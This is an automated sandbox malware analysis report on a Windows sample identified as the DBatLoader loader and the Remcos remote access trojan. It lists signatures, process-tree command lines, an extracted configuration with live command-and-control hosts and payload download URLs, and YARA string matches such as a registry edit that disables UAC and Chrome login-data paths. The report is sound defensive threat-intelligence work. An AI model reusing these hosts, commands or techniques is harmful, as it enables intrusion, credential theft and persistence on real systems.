Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jlPBMMQbXC.exe

Overview

General Information

Sample name:jlPBMMQbXC.exe
renamed because original name is a hash value
Original sample name:0225dcd9b2e37389e781d34d3027a1882ada68b4282089105bc637f4d8139561.exe
Analysis ID:1562864
MD5:a27b6de588ad4d4c0d6e0c656e580f4e
SHA1:48d25bbc2e65bd22678ca45d2b53b4ca8ce8059f
SHA256:0225dcd9b2e37389e781d34d3027a1882ada68b4282089105bc637f4d8139561
Tags:doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

DBatLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates a thread in another existing process (thread injection)
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses dynamic DNS services
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • jlPBMMQbXC.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\jlPBMMQbXC.exe" MD5: A27B6DE588AD4D4C0D6E0C656E580F4E)
    • cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hizbeleS.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 7624 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
    • esentutl.exe (PID: 7664 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jlPBMMQbXC.exe /d C:\\Users\\Public\\Libraries\\Selebzih.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SndVol.exe (PID: 7672 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Selebzih.PIF (PID: 7880 cmdline: "C:\Users\Public\Libraries\Selebzih.PIF" MD5: A27B6DE588AD4D4C0D6E0C656E580F4E)
    • SndVol.exe (PID: 7980 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Selebzih.PIF (PID: 8040 cmdline: "C:\Users\Public\Libraries\Selebzih.PIF" MD5: A27B6DE588AD4D4C0D6E0C656E580F4E)
    • colorcpl.exe (PID: 8136 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1", "https://lightstone.ae/image/233_Selebzihtih"]}

Threatname: Remcos

{"Host:Port:Password": ["pentester0.accesscam.org:56796:1", "archived.zapto.org:56797:1", "honeypotresearchteam.duckdns.org:13939:1"], "Assigned name": "Resignation Letter", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "Resignation.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Resignation-X9RTX9", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "resignation", "Keylog folder": "wetransfer"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6c4b8:$a1: Remcos restarted by watchdog!
        • 0x6ca30:$a3: %02i:%02i:%02i:%03i
        0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
        • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6657c:$str_b2: Executing file:
        • 0x675fc:$str_b3: GetDirectListeningPort
        • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x67128:$str_b7: \update.vbs
        • 0x665a4:$str_b9: Downloaded file:
        • 0x66590:$str_b10: Downloading file:
        • 0x66634:$str_b12: Failed to upload file:
        • 0x675c4:$str_b13: StartForward
        • 0x675e4:$str_b14: StopForward
        • 0x67080:$str_b15: fso.DeleteFile "
        • 0x67014:$str_b16: On Error Resume Next
        • 0x670b0:$str_b17: fso.DeleteFolder "
        • 0x66624:$str_b18: Uploaded file:
        • 0x665e4:$str_b19: Unable to delete:
        • 0x67048:$str_b20: while fso.FileExists("
        • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
        Click to see the 27 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        15.2.colorcpl.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          15.2.colorcpl.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            15.2.colorcpl.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              15.2.colorcpl.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6c4b8:$a1: Remcos restarted by watchdog!
              • 0x6ca30:$a3: %02i:%02i:%02i:%03i
              15.2.colorcpl.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
              • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
              • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x6657c:$str_b2: Executing file:
              • 0x675fc:$str_b3: GetDirectListeningPort
              • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x67128:$str_b7: \update.vbs
              • 0x665a4:$str_b9: Downloaded file:
              • 0x66590:$str_b10: Downloading file:
              • 0x66634:$str_b12: Failed to upload file:
              • 0x675c4:$str_b13: StartForward
              • 0x675e4:$str_b14: StopForward
              • 0x67080:$str_b15: fso.DeleteFile "
              • 0x67014:$str_b16: On Error Resume Next
              • 0x670b0:$str_b17: fso.DeleteFolder "
              • 0x66624:$str_b18: Uploaded file:
              • 0x665e4:$str_b19: Unable to delete:
              • 0x67048:$str_b20: while fso.FileExists("
              • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
              Click to see the 69 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
              Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\jlPBMMQbXC.exe, ProcessId: 7280, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
              Sigma detected: Execution from Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Selebzih.PIF" , CommandLine: "C:\Users\Public\Libraries\Selebzih.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Selebzih.PIF, NewProcessName: C:\Users\Public\Libraries\Selebzih.PIF, OriginalFileName: C:\Users\Public\Libraries\Selebzih.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Users\Public\Libraries\Selebzih.PIF" , ProcessId: 7880, ProcessName: Selebzih.PIF
              Sigma detected: New RUN Key Pointing to Suspicious Folder
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Selebzih.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\jlPBMMQbXC.exe, ProcessId: 7280, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Selebzih
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Selebzih.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\jlPBMMQbXC.exe, ProcessId: 7280, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Selebzih
              Sigma detected: Execution of Suspicious File Type Extension
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Selebzih.PIF" , CommandLine: "C:\Users\Public\Libraries\Selebzih.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Selebzih.PIF, NewProcessName: C:\Users\Public\Libraries\Selebzih.PIF, OriginalFileName: C:\Users\Public\Libraries\Selebzih.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Users\Public\Libraries\Selebzih.PIF" , ProcessId: 7880, ProcessName: Selebzih.PIF

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-26T08:12:14.259973+010020283713Unknown Traffic192.168.2.94972313.107.136.10443TCP
              2024-11-26T08:12:16.780726+010020283713Unknown Traffic192.168.2.94972913.107.136.10443TCP
              2024-11-26T08:12:22.042356+010020283713Unknown Traffic192.168.2.949746162.19.139.102443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-26T08:12:05.411791+010020365941Malware Command and Control Activity Detected192.168.2.949831103.186.117.15956796TCP
              2024-11-26T08:12:51.132303+010020365941Malware Command and Control Activity Detected192.168.2.949763103.186.117.15956796TCP
              2024-11-26T08:13:14.034543+010020365941Malware Command and Control Activity Detected192.168.2.949813103.186.117.15913939TCP
              2024-11-26T08:13:37.080639+010020365941Malware Command and Control Activity Detected192.168.2.949823103.186.117.15956796TCP
              2024-11-26T08:13:59.329994+010020365941Malware Command and Control Activity Detected192.168.2.949824103.186.117.15913939TCP
              2024-11-26T08:14:22.399426+010020365941Malware Command and Control Activity Detected192.168.2.949825103.186.117.15956796TCP
              2024-11-26T08:14:45.018684+010020365941Malware Command and Control Activity Detected192.168.2.949826103.186.117.15913939TCP
              2024-11-26T08:15:08.284779+010020365941Malware Command and Control Activity Detected192.168.2.949827103.186.117.15956796TCP
              2024-11-26T08:15:30.463623+010020365941Malware Command and Control Activity Detected192.168.2.949828103.186.117.15913939TCP
              2024-11-26T08:15:53.927407+010020365941Malware Command and Control Activity Detected192.168.2.949829103.186.117.15956796TCP
              2024-11-26T08:16:16.567390+010020365941Malware Command and Control Activity Detected192.168.2.949830103.186.117.15913939TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: jlPBMMQbXC.exeAvira: detected
              Antivirus detection for URL or domain
              Source: archived.zapto.orgAvira URL Cloud: Label: malware
              Source: honeypotresearchteam.duckdns.orgAvira URL Cloud: Label: malware
              Antivirus detection for dropped file
              Source: C:\Users\Public\Libraries\Selebzih.PIFAvira: detection malicious, Label: TR/AD.Nekark.mucip
              Found malware configuration
              Source: jlPBMMQbXC.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1", "https://lightstone.ae/image/233_Selebzihtih"]}
              Source: 00000008.00000002.3861881906.00000000025DD000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["pentester0.accesscam.org:56796:1", "archived.zapto.org:56797:1", "honeypotresearchteam.duckdns.org:13939:1"], "Assigned name": "Resignation Letter", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "Resignation.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Resignation-X9RTX9", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "resignation", "Keylog folder": "wetransfer"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\Public\Libraries\Selebzih.PIFReversingLabs: Detection: 63%
              Multi AV Scanner detection for submitted file
              Source: jlPBMMQbXC.exeReversingLabs: Detection: 63%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
              Machine Learning detection for dropped file
              Source: C:\Users\Public\Libraries\Selebzih.PIFJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: jlPBMMQbXC.exeJoe Sandbox ML: detected
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_291638C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_291638C8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_004338C8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_078045E5 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_078045E5
              Source: SndVol.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

              Exploits

              barindex
              Yara detected UAC Bypass using CMSTP
              Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR

              Privilege Escalation

              barindex
              Contains functionality to bypass UAC (CMSTPLUA)
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29137538 _wcslen,CoGetObject,8_2_29137538
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00407538 _wcslen,CoGetObject,15_2_00407538
              Source: jlPBMMQbXC.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 13.107.136.10:443 -> 192.168.2.9:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.19.139.102:443 -> 192.168.2.9:49746 version: TLS 1.2
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: jlPBMMQbXC.exe, jlPBMMQbXC.exe, 00000000.00000002.1577348813.00000000023E6000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9E0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1386950607.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1564129488.0000000005420000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
              Source: Binary string: easinvoker.pdbH source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbGCTL source: jlPBMMQbXC.exe, 00000000.00000002.1577348813.00000000023E6000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E41E000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9E0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1386950607.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E44F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1564129488.0000000005420000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C55908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02C55908
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29138847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_29138847
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29137877 FindFirstFileW,FindNextFileW,8_2_29137877
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2917E8F9 FindFirstFileExA,8_2_2917E8F9
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2913BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_2913BB6B
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29149B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_29149B86
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2913BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_2913BD72
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2914C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_2914C322
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2913C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_2913C388
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2913928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_2913928E
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_291396A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_291396A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_0040928E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C322
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C388
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_004096A0
